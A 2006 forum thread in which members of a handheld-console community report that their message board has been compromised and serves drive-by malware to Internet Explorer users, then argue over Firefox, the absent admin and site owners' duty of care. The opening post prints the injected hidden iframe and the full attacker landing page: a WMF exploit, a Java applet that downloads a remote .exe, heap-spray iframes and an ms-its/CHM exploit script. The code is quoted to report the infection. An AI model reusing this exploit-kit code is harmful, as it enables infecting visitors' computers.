41 replies to this topic

[Doctor]

<iframe src="http://traffsale1.bi.../dl/adv725.php" width=1 height=1></iframe>

with a user agent for Internet Explorer, a user gets a bunch of nice nasty hacky stuff

prometheus:~# lynx -useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"  -source http://traffsale1.biz/dl/adv725.php
Warning: User-Agent string does not contain "Lynx" or "L_y_n_x"!
<html>
<body>
<iframe src="xpladv725.wmf" width=1 height=1></iframe>
<applet archive="java.jar" code="GetAccess.class" width=1 height=1><param name="ModulePath" value="http://traffsale1.biz/dl/loaderadv725_2.exe"></applet>

<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv725.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv725.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv725.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv725.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv725.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv725.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv725.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv725.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=bag.htm></iframe>

<applet width=1 height=1 ARCHIVE=loaderadv725.jar code=Counter></APPLET>
<script LANGUAGE="JavaScript">
obj = "<object data=\"ms-its:mhtml:file";
obj1 = "://C:\\nosuch.mht!http://traffsale1.biz/dl/adv725/x.chm::/x.htm\" type=\"text/x-scriptlet\"></object>";
document.write(obj+obj1);
</script>
</body>
</html>
prometheus:~#

[Tinnus]

I think the best solution is just to use Firefox

[daclassicgamingmaster]

I think the best solution is just to use Firefox

^ This should be sigged

done

[Rico]

No, that's not a viable solution at all. Many of our users use IE by choice or by force, and frankly I have no idea why this thing hasn't been removed yet.

[Vimacs]

No, that's not a viable solution at all. Many of our users use IE by choice or by force, and frankly I have no idea why this thing hasn't been removed yet.

simple, hando wasnt online since 3rd march, that was before the problem existed.

[rokdcasbah]

i use firefox so like many others i didn't notice the problem at first. and i don't doubt that hando has plenty of better things to be doing. but at present the board has over 8,000 registered users. if only a quarter of them use IE than you still have 2,000 people.

the initial security breach is probably not worth blaming anyone for, but a great number of people's computers are at risk for almost certain infection, if they have not been infected already. many of these are corporate machines.

hando should have fixed the hole by now. it's possible and fairly probable that he could be taken to civil court for damages due to negligence. no, nobody's putting a gun to your head and making you visit these forums. and again, the initial problem is (arguably) no one's fault except the person who engineered the exploit. and it's not like hando's some scheming corporate type who only answers to the shareholders. but wherever you come from, you have a "duty of care" to act reasonably and appropriately around others, if you know that failing to do so could directly harm them. what we have here is a lot of harm being done to a lot of people over an extended period of time. there is a point where that becomes inexcusable.

i hope this gets sorted out, for the sake of all those who've been infected, all those who've yet to be infected, and i hope that hando realizes he could be risking something bigger than his OS.

the larger lesson, and this is unfortunate, is that the internet is not a safe place. at bare minimum, anyone with a broadband connection needs: a firewall (software or hardware, even just a router is good protection), virus protection, spyware protection, and a browser that's configured for safety. firefox comes like this. but internet explorer can be made secure as well.

Edited by rokdcasbah, 09 March 2006 - 01:00 AM.

[tmcleroy]

any one not using firefox deserves a virus. I mean come on! most people here are very knowledgable about computers so get with the program and ditch ie.

[DaveC]

Where I work IE is the standard browser and firefox or any other software is forbidden by the IT dept for any user to install. We are NOT allowed to install software of any kind. Because I have shown my GP2X to someone there they have bought one. They also went to this site before I could warn against it. The virus totally trashed his system resulting in a loss of many hours of work while the HDD was reformatted and reconstructed . As many may have noticed (and are probably glad ) I have not been able to visit this site at work because of this virus.

The "use Firefox" excuse is not to valid anymore. This board has been infected for DAYS now. Why is it still infected? This is becomming ridiculous at this point. Can't someone go in and remove the offending iframe that is causing this? Is it really THAT hard? It is like they just don't care if the board is still infected or if users are infected. There was a small note on the front page that has slid down the list. There should be a huge banner in red at the top that says "warning: forums infected by viruses and malware, DO NOT enter unless using firefox and/or adequately protected from the latest viruses" and it should stay there until someone decides to fix this.

Very dissapointing.

[Shane R. Monroe]

Not to be an ass or anything, but shouldn't you be ... um WORKING at work? Seriously, safe or not for IE - I'm sure MOST companies wouldn't find GP32x.com forums as "official business". Doesn't mean most of us don't do it - but I find it interesting that people consistant use "I have to use IE at work, so fix your ENTERTAINMENT based website" ...

That being said ... I work for the government. Getting ANYTHING ratified is a VERY LONG process. It requires tons of justification, meetings, powerpoint presentations explaining WHY the status quo isn't good enough and why a change is needed.

With all these stringent requirements - I managed to get Opera approved for use on our computers. It can be done. More and more people are taking Opera home and using it as their home browser thanks to the authorization we've managed to obtain at work. Our programmers are learning to code GOOD, CLEAN HTML code and javascript. The Javascript debugger is far superior to IE (and I like it better than firefox). In any event, change is possible. If I get get a governmental group to change, corporate can't be any harder.

In any event - blocking content in Opera is easy. Simply block the iframe's source file (or whatever else you want) in the filter.ini and you're DONE. No more problem. I dunno if Firefox allows the same thing - but if it doesn't, it should.

All this said - I agree that with a known issue - it should be fixed. I notice this board is a "trial" copy (as seen at the bottom of every page). Perhaps the fix isn't available for TRIAL copies and that's why we're not getting it. Do we need to start a fund to BUY the board? Get the tech support?

Just talkin' out loud folks.

[Rico]

simple, hando wasnt online since 3rd march, that was before the problem existed.

I know that, dummy, therefore I was wondering why hando's been gone for a week.

[Javacat]

I run the IT department where I work and firefox is the only thing I use with regards to a web browser



Someone could, you know, hack the board again to remove the virus Of course hando would probably be pissed off if somebody did this and block them.

[Miknal]

There is of course a slight upside. I have never had any problem with ie, never had any virus's or anything. Then I visited this forum, on a uni pc, so the security stopped it straight away (With hundreds of pcs on one network, and thousands of students (30,000 in total) depending on the network for work you have to make sure security is good.) but since then I have been using firefox. So a new person has been converted.

In all seriousness though, saying its peoples fault for using ie is stupid elitist claptrap, (and of all the things to get elitist about, a web browser? Get a grip people) it should be fixed as it is harming people, surely that is obvious?

[skeezix]

Solution is easy; the boards should be shut down until they're clean. Helping distribute nasties is a bit ugly..

Hando is a busy lad, but can any of the mods muck with that level of things?

r post a big news item ("don't go to the boards right now!") at least

jeff <-- firefox user